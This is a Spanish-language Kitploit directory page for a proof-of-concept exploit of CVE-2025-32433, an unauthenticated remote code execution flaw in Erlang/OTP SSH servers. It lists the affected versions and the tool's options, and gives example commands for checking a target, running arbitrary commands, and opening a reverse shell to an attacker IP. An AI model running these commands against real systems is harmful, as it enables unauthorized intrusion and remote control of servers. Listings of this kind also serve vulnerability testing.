Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC — La vulnerabilidad permite que un atacante con acceso a la red a un servidor SSH Erlang/OTP ejecute código arbitrario sin autenticación previa. | Kitploit
Herramientas/GitHubGitHub/omer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc
Análisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubomer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

La vulnerabilidad permite que un atacante con acceso a la red a un servidor SSH Erlang/OTP ejecute código arbitrario sin autenticación previa.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
162hace 1 añoAún no revisado

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

La vulnerabilidad permite a un atacante con acceso de red a un servidor SSH de Erlang/OTP ejecutar código arbitrario sin autenticación previa.

Descripción

Se ha identificado una vulnerabilidad grave en el servidor SSH de Erlang/OTP que puede permitir a un atacante realizar una ejecución remota de código (RCE) sin autenticación. Al explotar una falla en el manejo de mensajes del protocolo SSH, un actor malicioso podría obtener acceso no autorizado a los sistemas afectados y ejecutar comandos arbitrarios sin credenciales válidas. Esto podría comprometer dichos hosts, permitiendo que terceros accedan y manipulen sin autorización datos sensibles, o provocar ataques de denegación de servicio.

Versiones afectadas

root@kitploit:~
OTP-27.3.2 y anteriores
OTP-26.2.5.10 y anteriores
OTP-25.3.2.19 y anteriores

Características

  • Comprobación de vulnerabilidad: Determina si un objetivo es vulnerable a CVE-2025-32433.
  • Ejecución del exploit: Ejecuta comandos arbitrarios.
  • Shell inversa: Inicia una shell inversa basada en bash.

Uso

root@kitploit:~
python cve-2025-32433.py <host> [options]

Opciones:

root@kitploit:~
-p PORT, --port PORT: Puerto SSH (por defecto: 22)

-t TIMEOUT, --timeout TIMEOUT: Tiempo de espera de conexión en segundos (por defecto: 5)

-c COMMAND, --command COMMAND: Comando personalizado a ejecutar

--check: Comprueba si el objetivo es vulnerable

-u urls.txt, --urlfile urls.txt: Archivo que contiene la lista de hosts a escanear (uno por línea)

-o output.txt, --output output.txt: Archivo de salida para almacenar los resultados.

--shell: Lanzar una shell inversa

--lhost LHOST: IP del atacante para la shell inversa

--lport LPORT: Puerto del atacante para la shell inversa (por defecto: 4444)

Ejemplos:

Comprobar vulnerabilidad:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --check

Ejecutar un comando:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'

Iniciar una shell inversa:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

Referencias

GitHub Advisory

NVD CVE-2025-32433

Platform Security

Descargar herramienta